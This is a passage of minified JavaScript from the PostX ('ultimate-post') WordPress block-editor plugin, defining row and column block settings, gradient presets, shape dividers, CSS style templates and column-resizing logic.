100%)",slug:"mind-crawl"},{name:"Angel Care",gradient:"linear-gradient(-245deg, rgb(255, 226, 159) 0%, rgb(255, 169, 159) 48%, rgb(255, 113, 154) 100%)",slug:"angel-care"},{name:"Deep Blue",gradient:"linear-gradient(90deg, rgb(106, 17, 203) 0%, rgb(37, 117, 252) 100%)",slug:"deep-blue"},{name:"Mole Hall",gradient:"linear-gradient(-290deg, rgb(97, 97, 97) 0%, rgb(155, 197, 195) 100%)",slug:"mole-hall"},{name:"Over Sun",gradient:"linear-gradient(60deg, rgb(171, 236, 214) 0%, rgb(251, 237, 150) 100%)",slug:"over-sun"},{name:"Clean Mirror",gradient:"linear-gradient(45deg, rgb(147, 165, 207) 0%, rgb(228, 239, 233) 100%)",slug:"clean-mirror"},{name:"Strong Bliss",gradient:"linear-gradient(90deg, rgb(247, 140, 160) 0%, rgb(249, 116, 143) 19%, rgb(253, 134, 140) 60%, rgb(254, 154, 139) 100%)",slug:"strong-bliss"},{name:"Sweet Period",gradient:"linear-gradient(0deg, rgb(63, 81, 177) 0%, rgb(90, 85, 174) 13%, rgb(123, 95, 172) 25%, rgb(143, 106, 174) 38%, rgb(168, 106, 164) 50%)",slug:"sweet-period"},{name:"Purple Division",gradient:"linear-gradient(0deg, rgb(112, 40, 228) 0%, rgb(229, 178, 202) 100%)",slug:"purple-division"},{name:"Cold Evening",gradient:"linear-gradient(0deg, rgb(12, 52, 131) 0%, rgb(162, 182, 223) 100%, rgb(107, 140, 206) 100%, rgb(162, 182, 223) 100%)",slug:"cold-evening"},{name:"Desert Hump",gradient:"linear-gradient(0deg, rgb(199, 144, 129) 0%, rgb(223, 165, 121) 100%)",slug:"desert-hump"},{name:"Eternal Constance",gradient:"linear-gradient(0deg, rgb(9, 32, 63) 0%, rgb(83, 120, 149) 100%)",slug:"ethernal-constance"},{name:"Juicy Cake",gradient:"linear-gradient(0deg, rgb(225, 79, 173) 0%, rgb(249, 212, 35) 100%)",slug:"juicy-cake"},{name:"Rich Metal",gradient:"linear-gradient(90deg, rgb(215, 210, 204) 0%, rgb(48, 67, 82) 100%)",slug:"rich-metal"}]},{type:"range",key:"rowTopShapeWidth",min:100,max:300,step:1,responsive:!0,label:__("Width","ultimate-post")},{type:"range",key:"rowTopShapeHeight",min:0,max:500,step:1,responsive:!0,label:__("Height","ultimate-post")},{type:"toggle",key:"rowTopShapeFlip",label:__("Flip","ultimate-post")},{type:"toggle",key:"rowTopShapeFront",label:__("Bring to Front","ultimate-post")},{type:"range",key:"rowTopShapeOffset",min:-100,max:100,step:1,responsive:!0,label:__("Offset","ultimate-post")}]},{name:"Bottom",title:__("Bottom","ultimate-post"),options:[{type:"select",key:"rowBtmShape",label:__("Type","ultimate-post"),svgClass:"btmShapeIcon",svg:!0,options:[{value:"empty",label:__("Empty","ultimate-post")},{value:"tilt",label:__("Tilt","ultimate-post"),svg:(0,i.T)("tilt")},{value:"mountain",label:__("Mountain","ultimate-post"),svg:(0,i.T)("mountain")},{value:"waves",label:__("Waves","ultimate-post"),svg:(0,i.T)("waves")},{value:"curve",label:__("Curve","ultimate-post"),svg:(0,i.T)("curve")},{value:"curve_invert",label:__("Curve Invert","ultimate-post"),svg:(0,i.T)("curve_invert")},{value:"asymmetrical_triangle",label:__("Asymmetrical Tringle","ultimate-post"),svg:(0,i.T)("asymmetrical_triangle")},{value:"asymmetrical_triangle_invert",label:__("Asymmetrical Tringle Invert","ultimate-post"),svg:(0,i.T)("asymmetrical_triangle_invert")},{value:"waves_invert",label:__("Waves Invert","ultimate-post"),svg:(0,i.T)("waves_invert")}]},{type:"color2",key:"rowBtmGradientColor",label:__("Color","ultimate-post"),extraClass:"ultp-hide-field-item",customGradient:[{name:"Plum Plate",gradient:"linear-gradient(113deg, rgb(102, 126, 234) 0%, rgb(118, 75, 162) 100%)",slug:"plum-plate"},{name:"Aqua Splash",gradient:"linear-gradient(15deg, rgb(19, 84, 122) 0%, rgb(128, 208, 199) 100%)",slug:"aqua-splash"},{name:"Teen Party",gradient:"linear-gradient(-225deg, rgb(255, 5, 124) 0%, rgb(141, 11, 147) 50%, rgb(50, 21, 117) 100%)",slug:"teen-party"},{name:"Fabled Sunset",gradient:"linear-gradient(-270deg, rgb(35, 21, 87) 0%, rgb(68, 16, 122) 29%, rgb(255, 19, 97) 67%, rgb(255, 248, 0) 100%)",slug:"fabled-sunset"},{name:"Night Call",gradient:"linear-gradient(-245deg, rgb(172, 50, 228) 0%, rgb(121, 24, 242) 48%, rgb(72, 1, 255) 100%)",slug:"night-call"},{name:"Itmeo Branding",gradient:"linear-gradient(18deg, rgb(42, 245, 152) 0%, rgb(0, 158, 253) 100%)",slug:"itmeo-branding"},{name:"Morning Salad",gradient:"linear-gradient(-255deg, rgb(183, 248, 219) 0%, rgb(80, 167, 194) 100%)",slug:"morning-salad"},{name:"Mind Crawl",gradient:"linear-gradient(-245deg, rgb(71, 59, 123) 0%, rgb(53, 132, 167) 51%, rgb(48, 210, 190) 100%)",slug:"mind-crawl"},{name:"Angel Care",gradient:"linear-gradient(-245deg, rgb(255, 226, 159) 0%, rgb(255, 169, 159) 48%, rgb(255, 113, 154) 100%)",slug:"angel-care"},{name:"Deep Blue",gradient:"linear-gradient(90deg, rgb(106, 17, 203) 0%, rgb(37, 117, 252) 100%)",slug:"deep-blue"},{name:"Mole Hall",gradient:"linear-gradient(-290deg, rgb(97, 97, 97) 0%, rgb(155, 197, 195) 100%)",slug:"mole-hall"},{name:"Over Sun",gradient:"linear-gradient(60deg, rgb(171, 236, 214) 0%, rgb(251, 237, 150) 100%)",slug:"over-sun"},{name:"Clean Mirror",gradient:"linear-gradient(45deg, rgb(147, 165, 207) 0%, rgb(228, 239, 233) 100%)",slug:"clean-mirror"},{name:"Strong Bliss",gradient:"linear-gradient(90deg, rgb(247, 140, 160) 0%, rgb(249, 116, 143) 19%, rgb(253, 134, 140) 60%, rgb(254, 154, 139) 100%)",slug:"strong-bliss"},{name:"Sweet Period",gradient:"linear-gradient(0deg, rgb(63, 81, 177) 0%, rgb(90, 85, 174) 13%, rgb(123, 95, 172) 25%, rgb(143, 106, 174) 38%, rgb(168, 106, 164) 50%)",slug:"sweet-period"},{name:"Purple Division",gradient:"linear-gradient(0deg, rgb(112, 40, 228) 0%, rgb(229, 178, 202) 100%)",slug:"purple-division"},{name:"Cold Evening",gradient:"linear-gradient(0deg, rgb(12, 52, 131) 0%, rgb(162, 182, 223) 100%, rgb(107, 140, 206) 100%, rgb(162, 182, 223) 100%)",slug:"cold-evening"},{name:"Desert Hump",gradient:"linear-gradient(0deg, rgb(199, 144, 129) 0%, rgb(223, 165, 121) 100%)",slug:"desert-hump"},{name:"Eternal Constance",gradient:"linear-gradient(0deg, rgb(9, 32, 63) 0%, rgb(83, 120, 149) 100%)",slug:"ethernal-constance"},{name:"Juicy Cake",gradient:"linear-gradient(0deg, rgb(225, 79, 173) 0%, rgb(249, 212, 35) 100%)",slug:"juicy-cake"},{name:"Rich Metal",gradient:"linear-gradient(90deg, rgb(215, 210, 204) 0%, rgb(48, 67, 82) 100%)",slug:"rich-metal"}]},{type:"range",key:"rowBtmShapeWidth",min:100,max:300,step:1,responsive:!0,label:__("Width","ultimate-post")},{type:"range",key:"rowBtmShapeHeight",min:0,max:500,step:1,responsive:!0,label:__("Height","ultimate-post")},{type:"toggle",key:"rowBtmShapeFlip",label:__("Flip","ultimate-post")},{type:"toggle",key:"rowBtmShapeFront",label:__("Bring to Front","ultimate-post")},{type:"range",key:"rowBtmShapeOffset",min:-100,max:100,step:1,responsive:!0,label:__("Offset","ultimate-post")}]}]}}],store:e}),(0,o.createElement)(a.T,{title:__("Row Color","ultimate-post"),include:[{position:1,data:{type:"color",key:"rowColor",label:__("Color","ultimate-post")}},{position:2,data:{type:"color",key:"rowLinkColor",label:__("Link Color","ultimate-post")}},{position:3,data:{type:"color",key:"rowLinkHover",label:__("Link Hover Color","ultimate-post")}},{position:4,data:{type:"typography",key:"rowTypo",label:__("Typography","ultimate-post")}}],store:e}),(0,o.createElement)(a.T,{doc:"https://wpxpo.com/docs/postx/postx-features/row-column/#making-row-sticky",title:__("Row Sticky","ultimate-post"),include:[{position:1,data:{type:"select",key:"rowStickyPosition",options:[{value:"",label:__("Normal","ultimate-post")},{value:"row_sticky",label:__("Sticky","ultimate-post")},{value:"row_scrollToStickyTop",label:__("Fixed ( on Top Scroll )","ultimate-post")}],label:__("Choose Behavior","ultimate-post")}},{position:2,data:{type:"toggle",key:"rowDisableSticky",label:__("Disable Sticky ( on Breakpoint )","ultimate-post")}},{position:3,data:{type:"range",key:"disableStickyRanges",min:0,max:1200,step:1,label:__("Breakpoint ( px )","ultimate-post")}}],store:e}))},40358:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},previewImg:{type:"string",default:""},currentPostId:{type:"string",default:""},layout:{type:"object",default:{}},columnGap:{type:"object",default:{lg:"20",sm:"10",xs:"5"},style:[{selector:"{{ULTP}} > .ultp-row-wrapper > .block-editor-inner-blocks > .block-editor-block-list__layout, \n                {{ULTP}} > .ultp-row-wrapper > .ultp-row-content { column-gap: {{columnGap}}px;}"}]},rowGap:{type:"object",default:{lg:"20"},style:[{selector:"{{ULTP}} > .ultp-row-wrapper > .block-editor-inner-blocks > .block-editor-block-list__layout, \n            {{ULTP}} > .ultp-row-wrapper > .ultp-row-content { row-gap: {{rowGap}}px }"}]},inheritThemeWidth:{type:"boolean",default:!1},rowContentWidth:{type:"object",default:{lg:"1140",ulg:"px"},style:[{depends:[{key:"inheritThemeWidth",condition:"==",value:!1}],selector:" {{ULTP}} > .ultp-row-wrapper  > .block-editor-inner-blocks > .block-editor-block-list__layout, \n                {{ULTP}} > .ultp-row-wrapper > .ultp-row-content { max-width: {{rowContentWidth}}; margin-left: auto !important; margin-right: auto !important;}"}]},contentHeightType:{type:"string",default:"normal",style:[{depends:[{key:"contentHeightType",condition:"==",value:"custom"}]},{depends:[{key:"contentHeightType",condition:"==",value:"normal"}]},{depends:[{key:"contentHeightType",condition:"==",value:"windowHeight"}],selector:"{{ULTP}} > .ultp-row-wrapper > .block-editor-inner-blocks > .block-editor-block-list__layout, \n                {{ULTP}} > .ultp-row-wrapper > .ultp-row-content { height: 100vh; }"}]},contentHeight:{type:"object",default:{lg:"100",ulg:"px"},style:[{depends:[{key:"contentHeightType",condition:"==",value:"custom"}],selector:"{{ULTP}} > .ultp-row-wrapper > .block-editor-inner-blocks > .block-editor-block-list__layout, \n                {{ULTP}} > .ultp-row-wrapper > .ultp-row-content { min-height: {{contentHeight}} }"}]},contentOverflow:{type:"string",default:"visible",style:[{selector:"{{ULTP}} > .ultp-row-wrapper > .block-editor-inner-blocks > .block-editor-block-list__layout,  \n            {{ULTP}} > .ultp-row-wrapper > .ultp-row-content { overflow: {{contentOverflow}} }"}]},HtmlTag:{type:"string",default:"div"},enableRowLink:{type:"boolean",default:!1},rowWrapperLink:{type:"string",default:"",style:[{depends:[{key:"enableRowLink",condition:"==",value:!0}]}]},enableNewTab:{type:"boolean",default:!1,style:[{depends:[{key:"enableRowLink",condition:"==",value:!0}]}]},reverseEle:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} > .ultp-row-wrapper > .block-editor-inner-blocks > .block-editor-block-list__layout, \n            {{ULTP}} > .ultp-row-wrapper > .ultp-row-content { flex-direction: row; }"},{depends:[{key:"reverseEle",condition:"==",value:!0}],selector:"{{ULTP}} > .ultp-row-wrapper > .block-editor-inner-blocks > .block-editor-block-list__layout, \n            {{ULTP}} > .ultp-row-wrapper > .ultp-row-content { flex-direction: row-reverse; }"}]},ColumnAlign:{type:"string",default:"",style:[{depends:[{key:"ColumnAlign",condition:"==",value:"stretch"}],selector:"{{ULTP}} > .ultp-row-wrapper > .ultp-row-content > .wp-block-ultimate-post-column { height: auto } \n                {{ULTP}} > .ultp-row-wrapper > .block-editor-inner-blocks > .block-editor-block-list__layout > .wp-block > .wp-block-ultimate-post-column, \n                {{ULTP}} > .ultp-row-wrapper > .block-editor-inner-blocks > .block-editor-block-list__layout > .wp-block > .wp-block-ultimate-post-column > .ultp-column-wrapper { height: 100%; box-sizing: border-box;}"},{depends:[{key:"ColumnAlign",condition:"!=",value:"stretch"}]},{selector:"{{ULTP}} > .ultp-row-wrapper > .block-editor-inner-blocks > .block-editor-block-list__layout, \n                {{ULTP}} > .ultp-row-wrapper > .ultp-row-content { align-items: {{ColumnAlign}} } "}]},rowBgImg:{type:"object",default:{openColor:0,type:"color",color:"#f5f5f5",size:"cover",repeat:"no-repeat",loop:!0},style:[{selector:"{{ULTP}} > .ultp-row-wrapper"}]},rowWrapHoverImg:{type:"object",default:{openColor:0,type:"color",color:"#f5f5f5",size:"cover",repeat:"no-repeat"},style:[{selector:"{{ULTP}} > .ultp-row-wrapper:hover"}]},rowOverlayBgImg:{type:"object",default:{openColor:0,type:"color",color:"#f5f5f5",size:"cover",repeat:"no-repeat"},style:[{selector:"{{ULTP}} > .ultp-row-wrapper > .ultp-row-overlay"}]},rowOverlayOpacity:{type:"string",default:"50",style:[{selector:"{{ULTP}} > .ultp-row-wrapper > .ultp-row-overlay { opacity:{{rowOverlayOpacity}}%; }"}]},rowOverlayBgFilter:{type:"object",default:{openFilter:0,hue:0,saturation:100,brightness:100,contrast:100,invert:0,blur:0},style:[{selector:"{{ULTP}} > .ultp-row-wrapper > .ultp-row-overlay { {{rowOverlayBgFilter}} }"}]},rowOverlayBgBlend:{type:"string",default:"",style:[{selector:"{{ULTP}} > .ultp-row-wrapper > .ultp-row-overlay { mix-blend-mode:{{rowOverlayBgBlend}}; }"}]},rowOverlaypHoverImg:{type:"object",default:{openColor:0,type:"color",color:"#f5f5f5",size:"cover",repeat:"no-repeat"},style:[{selector:"{{ULTP}} > .ultp-row-wrapper:hover > .ultp-row-overlay"}]},rowOverlayHovOpacity:{type:"string",default:"50",style:[{selector:"{{ULTP}} > .ultp-row-wrapper:hover > .ultp-row-overlay { opacity:{{rowOverlayHovOpacity}}% }"}]},rowOverlayHoverFilter:{type:"object",default:{openFilter:0,hue:0,saturation:100,brightness:100,contrast:100,invert:0,blur:0},style:[{selector:"{{ULTP}} > .ultp-row-wrapper:hover > .ultp-row-overlay { {{rowOverlayHoverFilter}} }"}]},rowOverlayHoverBgBlend:{type:"string",default:"",style:[{selector:"{{ULTP}} > .ultp-row-wrapper:hover > .ultp-row-overlay { mix-blend-mode:{{rowOverlayHoverBgBlend}}; }"}]},rowWrapMargin:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{selector:"{{ULTP}} > .ultp-row-wrapper { margin:{{rowWrapMargin}}; }"}]},rowWrapPadding:{type:"object",default:{lg:{top:"15",bottom:"15",unit:"px"}},style:[{selector:"{{ULTP}}.wp-block-ultimate-post-row > .ultp-row-wrapper:not(:has( > .components-resizable-box__container)), \n            {{ULTP}}.wp-block-ultimate-post-row > .ultp-row-wrapper:has( > .components-resizable-box__container) > .block-editor-inner-blocks {padding: {{rowWrapPadding}}; }"}]},rowWrapBorder:{type:"object",default:{openBorder:0,width:{top:2,right:2,bottom:2,left:2},color:"#dfdfdf"},style:[{selector:"{{ULTP}} > .ultp-row-wrapper"}]},rowWrapRadius:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} > .ultp-row-wrapper { border-radius: {{rowWrapRadius}};} \n            {{ULTP}} > .ultp-row-wrapper > .ultp-row-overlay { border-radius: {{rowWrapRadius}}; }"}]},rowWrapShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} > .ultp-row-wrapper"}]},rowWrapHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} > .ultp-row-wrapper:hover"}]},rowWrapHoverRadius:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} > .ultp-row-wrapper:hover, \n            {{ULTP}} > .ultp-row-wrapper:hover > .ultp-row-overlay { border-radius: {{rowWrapHoverRadius}};}"}]},rowWrapHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} > .ultp-row-wrapper:hover"}]},rowTopShape:{type:"string",default:"empty"},rowTopGradientColor:{type:"object",default:{openColor:1,type:"color",color:"#CCCCCC"}},rowTopShapeWidth:{type:"object",default:{lg:""},style:[{selector:"{{ULTP}} > .ultp-row-wrapper > .ultp-shape-top > svg { width:calc({{rowTopShapeWidth}}% + 1.3px); }"}]},rowTopShapeHeight:{type:"object",default:{lg:""},style:[{selector:"{{ULTP}} > .ultp-row-wrapper > .ultp-shape-top > svg { height:{{rowTopShapeHeight}}px; } "}]},rowTopShapeFlip:{type:"boolean",default:!1,style:[{depends:[{key:"rowTopShapeFlip",condition:"==",value:!1}]},{depends:[{key:"rowTopShapeFlip",condition:"==",value:!0}],selector:"{{ULTP}} > .ultp-row-wrapper > .ultp-shape-top > svg { transform:rotateY(180deg); }"}]},rowTopShapeFront:{type:"boolean",default:!1,style:[{depends:[{key:"rowTopShapeFront",condition:"==",value:!1}]},{depends:[{key:"rowTopShapeFront",condition:"==",value:!0}],selector:"{{ULTP}} > .ultp-row-wrapper > .ultp-shape-top { z-index: 1; }"}]},rowTopShapeOffset:{type:"object",default:{lg:""},style:[{selector:"{{ULTP}} > .ultp-row-wrapper > .ultp-shape-top { top: {{rowTopShapeOffset}}px !important; }"}]},rowBtmShape:{type:"string",default:"empty"},rowBtmGradientColor:{type:"object",default:{openColor:1,type:"color",color:"#CCCCCC"}},rowBtmShapeWidth:{type:"object",default:{lg:""},style:[{selector:"{{ULTP}} > .ultp-row-wrapper > .ultp-shape-bottom > svg, \n            {{ULTP}} > .ultp-shape-bottom > svg { width: calc({{rowBtmShapeWidth}}% + 1.3px); }"}]},rowBtmShapeHeight:{type:"object",default:{lg:""},style:[{selector:"{{ULTP}} > .ultp-row-wrapper > .ultp-shape-bottom > svg { height: {{rowBtmShapeHeight}}px; }"}]},rowBtmShapeFlip:{type:"boolean",default:!1,style:[{depends:[{key:"rowBtmShapeFlip",condition:"==",value:!1}]},{depends:[{key:"rowBtmShapeFlip",condition:"==",value:!0}],selector:"{{ULTP}} > .ultp-row-wrapper > .ultp-shape-bottom > svg { transform: rotateY(180deg) rotate(180deg); }"}]},rowBtmShapeFront:{type:"boolean",default:!1,style:[{depends:[{key:"rowBtmShapeFront",condition:"==",value:!1}]},{depends:[{key:"rowBtmShapeFront",condition:"==",value:!0}],selector:"{{ULTP}} > .ultp-row-wrapper > .ultp-shape-bottom { z-index: 1; }"}]},rowBtmShapeOffset:{type:"object",default:{lg:""},style:[{selector:"{{ULTP}} > .ultp-row-wrapper > .ultp-shape-bottom { bottom: {{rowBtmShapeOffset}}px !important; }"}]},rowColor:{type:"string",default:"",style:[{selector:"{{ULTP}} > .ultp-row-wrapper { color:{{rowColor}} } "}]},rowLinkColor:{type:"string",default:"",style:[{selector:"{{ULTP}} > .ultp-row-wrapper a { color:{{rowLinkColor}} }"}]},rowLinkHover:{type:"string",default:"",style:[{selector:"{{ULTP}} > .ultp-row-wrapper a:hover { color:{{rowLinkHover}}; }"}]},rowTypo:{type:"object",default:{openTypography:0,size:{lg:16,unit:"px"},height:{lg:20,unit:"px"},decoration:"none",family:"",weight:700},style:[{selector:"{{ULTP}} > .ultp-row-wrapper"}]},rowStickyPosition:{type:"string",default:""},rowDisableSticky:{type:"boolean",default:!1,style:[{depends:[{key:"rowStickyPosition",condition:"!=",value:""}]}]},disableStickyRanges:{type:"string",default:"",style:[{depends:[{key:"rowDisableSticky",condition:"==",value:!0},{key:"rowStickyPosition",condition:"==",value:"row_scrollToStickyTop"}],selector:" @media (max-width: {{disableStickyRanges}}px) { .postx-page {{ULTP}} { position: static !important; } }"},{depends:[{key:"rowDisableSticky",condition:"==",value:!0},{key:"rowStickyPosition",condition:"==",value:"row_sticky"}],selector:" @media (max-width: {{disableStickyRanges}}px) { .postx-page {{ULTP}} { position: static !important; } }"}]},advanceId:{type:"string",default:""},advanceZindex:{type:"string",default:"",style:[{selector:"body {{ULTP}}.wp-block-ultimate-post-row {z-index:{{advanceZindex}} !important;}"}]},hideExtraLarge:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},hideTablet:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},hideMobile:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},advanceCss:{type:"string",default:"",style:[{selector:""}]}}},91202:(e,t,l)=>{"use strict";l.d(t,{Z:()=>k});var o=l(87462),a=l(67294),i=l(53049),n=l(99838),r=l(59902),s=l(92637),p=l(55040),c=l(17898);const{__}=wp.i18n,{InspectorControls:u,InnerBlocks:d}=wp.blockEditor,{useState:m,useEffect:g,Fragment:y}=wp.element,{select:b,dispatch:v}=wp.data,{getBlockAttributes:h,getBlockRootClientId:f}=wp.data.select("core/block-editor");function k(e){const[t,l]=m(!1),[k,w]=m(""),[x]=(0,r.Z)(),{setAttributes:T,name:_,attributes:C,clientId:E,className:S,toggleSelection:P}=e,{previewImg:L,blockId:I,advanceId:B,columnWidth:U,columnOverlayImg:M,columnGutter:A}=C,H={setAttributes:T,name:_,attributes:C,clientId:E};g((()=>{const e=E.substr(0,6),t=h(f(E));I?I&&I!=e&&(t?.hasOwnProperty("ref")||(0,i.k0)()||t?.hasOwnProperty("theme")||T({blockId:e})):T({blockId:e})}),[E]);let N="";if(I&&(N=(0,n.Kh)(C,"ultimate-post/column",I,(0,i.k0)())),L)return(0,a.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:L,alt:"preview-image"});const j=(e,t)=>{const l=t?parseFloat(parseFloat(t).toFixed(2)):parseFloat(parseFloat(e.target.value).toFixed(2)),o=l>U.lg?-(l-parseFloat(U.lg)):parseFloat(U.lg)-l;if(o){let e=b("core/block-editor").getNextBlockClientId(E);e||(e=b("core/block-editor").getPreviousBlockClientId(E)),T({columnWidth:Object.assign({},U,{lg:l})});const t=b("core/block-editor").getBlockAttributes(e);v("core/block-editor").updateBlockAttributes(e,{columnWidth:Object.assign({},t.columnWidth,{lg:(parseFloat(t.columnWidth.lg)+o).toFixed(2)})})}},Z=(e,t,l,o,a)=>{const i=k<95?a:0,n=l<95?a:0;e&&t&&(e.style.flexBasis=`calc(${k}% - ${i}px)`,t.style.flexBasis=`calc(${(parseFloat(l)+o).toFixed(2)}% - ${n}px)`,O(e,t,parseFloat(k).toFixed(2),(parseFloat(l)+o).toFixed(2)))},O=(e,t,l,o)=>{if(e&&t){const a=(0,i.fY)().querySelector(`#${e.id} > .wp-block-ultimate-post-column > .ultp-column-wrapper > .ultp-colwidth-next-temp`),n=(0,i.fY)().querySelector(`#${e.id} > .wp-block-ultimate-post-column > .ultp-column-wrapper > .ultp-colwidth-prev-temp`),r=(0,i.fY)().querySelector(`#${t.id} > .wp-block-ultimate-post-column > .ultp-column-wrapper > .ultp-colwidth-next-temp`),s=(0,i.fY)().querySelector(`#${t.id} > .wp-block-ultimate-post-column > .ultp-column-wrapper > .ultp-colwidth-prev-temp`);a&&(a.innerHTML=`${l}%`),n&&(n.innerHTML=`${l}%`),r&&(r.innerHTML=`${o}%`),s&&(s.innerHTML=`${o}%`)}},R=b("core/block-editor").getBlockOrder(E).length>0,D=b("core/block-editor").getBlockParents(E),z=b("core/block-editor").getBlockAttributes(D[D.length-1])?.layout,F=b("core/block-editor").getBlockAttributes(D[D.length-1]),W=F?.columnGap,V={};["lg","sm","xs"].forEach((e=>{const t=z[e]?.filter((e=>100!=e)).length;V[e]=t&&U[e]<95&&0!=W[e]&&W[e]?W[e]*(t-1)/t:0})),JSON.stringify(V)!=JSON.stringify(A)&&T({columnGutter:V});const G=(0,i.fY)().querySelector(`#block-${E}`);G&&G.setAttribute("data-ultp",`.ultp-block-${I}`);const q=G?.parentNode?.offsetWidth,$=b("core/block-editor").getPreviousBlockClientId(E),K=b("core/block-editor").getNextBlockClientId(E),J=(0,i.fY)().querySelector(`#block-${E}`),Y=(0,i.fY)().querySelector(`#block-${K}`),X=b("core/block-editor").getBlockAttributes(K)?.columnWidth.lg,Q=k>U.lg?-(k-parseFloat(U.lg)):parseFloat(U.lg)-k;let ee=85;if(2==z?.lg.length&&!$&&K)t?Z(J,Y,X,Q,V[x]):O(J,Y,U.lg,X,V[x]);else if(3==z?.lg.length){if(!$&&K){const e=b("core/block-editor").getNextBlockClientId(K),t=e?b("core/block-editor").getBlockAttributes(e)?.columnWidth.lg:15;ee=85-parseFloat(t)}else if($&&K){const e=b("core/block-editor").getBlockAttributes($);ee=85-parseFloat(e.columnWidth.lg)}t?Z(J,Y,X,Q,V[x]):O(J,Y,U.lg,X,V[x])}return(0,a.createElement)(y,null,(0,a.createElement)(u,null,(0,a.createElement)(s.Sections,null,(0,a.createElement)(s.Section,{slug:"setting",title:__("Settings","ultimate-post")},"lg"==x&&z?.lg.length>1&&z?.lg.length<4&&($||!$)&&K&&U.lg<100&&(0,a.createElement)("div",{className:"ultp-field-wrap ultp-field-range ultp-field-columnwidth"},(0,a.createElement)("label",null,"Column Width"),(0,a.createElement)("div",{className:"ultp-range-control"},(0,a.createElement)("div",{className:"ultp-range-input"},(0,a.createElement)("input",{type:"range",min:15,max:ee,value:U.lg,step:.01,onChange:e=>{j(e)}}),(0,a.createElement)("input",{type:"number",min:15,max:ee,value:U.lg,step:.01,onChange:e=>{j(e)}})))),(0,a.createElement)(c.Z,{store:H})),(0,a.createElement)(s.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,a.createElement)(i.T,{title:__("General","ultimate-post"),include:[{position:1,data:{type:"text",key:"advanceId",label:__("ID","ultimate-post")}},{position:2,data:{type:"range",key:"advanceZindex",min:-100,max:1e4,step:1,label:__("z-index","ultimate-post")}},{position:3,data:{type:"select",key:"columnOverflow",label:__("Overflow","ultimate-post"),options:[{value:"visible",label:__("Visible","ultimate-post")},{value:"hidden",label:__("Hidden","ultimate-post")}]}},{position:4,data:{type:"toggle",key:"columnEnableLink",label:__("Enable Wrapper Link","ultimate-post")}},{position:5,data:{type:"text",key:"columnWrapperLink",label:__("Url","ultimate-post")}},{position:6,data:{type:"toggle",key:"columnTargetLink",label:__("Enable Target Blank","ultimate-post")}}],initialOpen:!0,store:H}),(0,a.createElement)(i.Mg,{store:H}),(0,a.createElement)(i.iv,{store:H})))),(0,a.createElement)("div",(0,o.Z)({},B&&{id:B},{className:`ultp-block-${I} ${S} ${R?"":"no-inner-block"}`}),N&&(0,a.createElement)("style",{dangerouslySetInnerHTML:{__html:N}}),(0,a.createElement)("div",{className:"ultp-column-wrapper"},1==M.openColor&&(0,a.createElement)("div",{className:"ultp-column-overlay"}),$&&100!=U.lg&&"lg"==x&&z?.lg.length>1&&z?.lg.length<4&&(0,a.createElement)("span",{className:"ultp-colwidth-tooltip ultp-colwidth-prev ultp-colwidth-prev-temp"},U[x],"%"),(0,a.createElement)(d,{templateLock:!1,renderAppender:R?void 0:()=>(0,a.createElement)(d.ButtonBlockAppender,null)}),K&&100!=U.lg&&"lg"==x&&z?.lg.length>1&&z?.lg.length<4&&(0,a.createElement)("span",{className:"ultp-colwidth-tooltip ultp-colwidth-next ultp-colwidth-next-temp"},U[x],"%"))),"lg"==x&&z?.lg.length>1&&z?.lg.length<4&&($||!$)&&K&&U.lg<100&&(0,a.createElement)("div",{className:"ultp-resizer-container",style:{width:q}},(0,a.createElement)(p.t,{position:"right",setLengthFunc:(e,t,o)=>{const a=(0,i.fY)().querySelector(`#block-${E}`),n=a?.parentNode?.offsetWidth,r=b("core/block-editor").getNextBlockClientId(E),s=(0,i.fY)().querySelector(`#block-${r}`),p=parseFloat(e)+parseFloat(100*t/n);j("event",p),a&&s&&(a.removeAttribute("style"),s.removeAttribute("style")),l(!1)},stateHandle:(e,t,o)=>{const a=(0,i.fY)().querySelector(`#block-${E}`)?.parentNode?.offsetWidth,n=parseFloat(e)+parseFloat(100*t/a);l(!0),w(parseFloat(n).toFixed(2))},unit:"%",previousLength:U.lg,toggleSelection:P,minWidth:15,maxWidth:ee||85})))}},70234:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(87462),a=l(67294);const{InnerBlocks:i}=wp.blockEditor;function n(e){const{blockId:t,advanceId:l,columnEnableLink:n,columnWrapperLink:r,columnTargetLink:s,columnOverlayImg:p}=e.attributes;return(0,a.createElement)("div",(0,o.Z)({},l&&{id:l},{className:`ultp-block-${t}`}),(0,a.createElement)("div",{className:"ultp-column-wrapper"},n&&(0,a.createElement)("a",{className:"ultp-column-link",target:s?"_blank":"_self",href:`${r}`}),1==p.openColor&&(0,a.createElement)("div",{className:"ultp-column-overlay"}),(0,a.createElement)(i.Content,null)))}},17898:(e,t,l)=>{"use strict";l.d(t,{Z:()=>i});var o=l(67294),a=l(53049);const{__}=wp.i18n,i=e=>{const{store:t}=e;return(0,o.createElement)(o.Fragment,null,(0,o.createElement)(a.T,{title:__("Column Item","ultimate-post"),include:[{position:1,data:{type:"tag",key:"columnOrderNumber",options:[{value:"1",label:__("1","ultimate-post")},{value:"2",label:__("2","ultimate-post")},{value:"3",label:__("3","ultimate-post")},{value:"4",label:__("4","ultimate-post")},{value:"5",label:__("5","ultimate-post")},{value:"6",label:__("6","ultimate-post")}],label:__("Column Order","ultimate-post")}},{position:3,data:{type:"range",key:"columnHeight",min:0,max:1300,step:1,unit:["px","%","vh","rem"],responsive:!0,label:__("Min 